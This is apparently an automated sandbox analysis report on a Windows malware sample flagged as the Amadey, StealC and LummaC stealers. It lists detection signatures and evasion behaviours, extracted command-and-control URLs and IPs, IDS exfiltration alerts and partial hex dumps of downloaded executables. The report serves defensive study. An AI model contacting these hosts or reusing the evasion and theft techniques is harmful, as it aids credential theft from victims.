Windows Analysis Report
2fQ8fpTWAP.exe

Overview

General Information

Sample name: 2fQ8fpTWAP.exe
renamed because original name is a hash value
Original sample name: dfc453c8498400fd0f9cd272a842f6e4893a362e9476764a6aec751b224c7eb3.exe
Analysis ID: 1561598
MD5: 72683bf9c6f350a7af5d18a98462fcdf
SHA1: 1fd96a421e53351f72998a1a72f923b36e866a0b
SHA256: dfc453c8498400fd0f9cd272a842f6e4893a362e9476764a6aec751b224c7eb3
Tags: exeuser-Chainskilabs
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Excessive usage of taskkill to terminate processes
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 2fQ8fpTWAP.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206/c4becf79229cb002.php:Py) Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/l Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000000.00000003.1443898887.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: f20b4c0961.exe.3848.11.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Multi AV Scanner detection for submitted file
Source: 2fQ8fpTWAP.exe ReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 2fQ8fpTWAP.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 2fQ8fpTWAP.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.8:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.8:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49914 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49943 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49942 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49944 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49941 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.8:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50023 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50103 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50102 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50104 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50100 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50101 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50108 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.168.112.67:443 -> 192.168.2.8:50174 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50177 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50179 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50180 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50182 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50183 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: f20b4c0961.exe, 0000000B.00000003.2685648261.0000000007D60000.00000004.00001000.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000002.2784603033.0000000005BF2000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Adobe Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 197MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49709 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49710
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49713 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49721 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49744 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49719 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49778 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49790 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49873 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:50198 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49712 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49712 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49716 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49736 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49736 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49714 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49714 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49743 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49743 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49763 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49836 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49815 -> 172.67.162.84:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://property-imper.sbs/api
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 20:15:11 GMTContent-Type: application/octet-streamContent-Length: 1866752Last-Modified: Sat, 23 Nov 2024 19:41:32 GMTConnection: keep-aliveETag: "67422fec-1c7c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 27 0a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 77 6a 63 69 66 7a 7a 00 e0 19 00 00 40 30 00 00 dc 19 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6c 66 69 67 70 76 65 00 10 00 00 00 20 4a 00 00 06 00 00 00 54 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4a 00 00 22 00 00 00 5a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 20:15:20 GMTContent-Type: application/octet-streamContent-Length: 1787392Last-Modified: Sat, 23 Nov 2024 19:41:38 GMTConnection: keep-aliveETag: "67422ff2-1b4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 c0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 68 00 00 04 00 00 f6 25 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 68 62 69 6f 6f 66 6e 00 b0 19 00 00 00 4f 00 00 a8 19 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 73 79 7a 66 68 69 6f 00 10 00 00 00 b0 68 00 00 04 00 00 00 20 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 68 00 00 22 00 00 00 24 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 20:15:29 GMTContent-Type: application/octet-streamContent-Length: 922624Last-Modified: Sat, 23 Nov 2024 19:39:45 GMTConnection: keep-aliveETag: "67422f81-e1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 2f 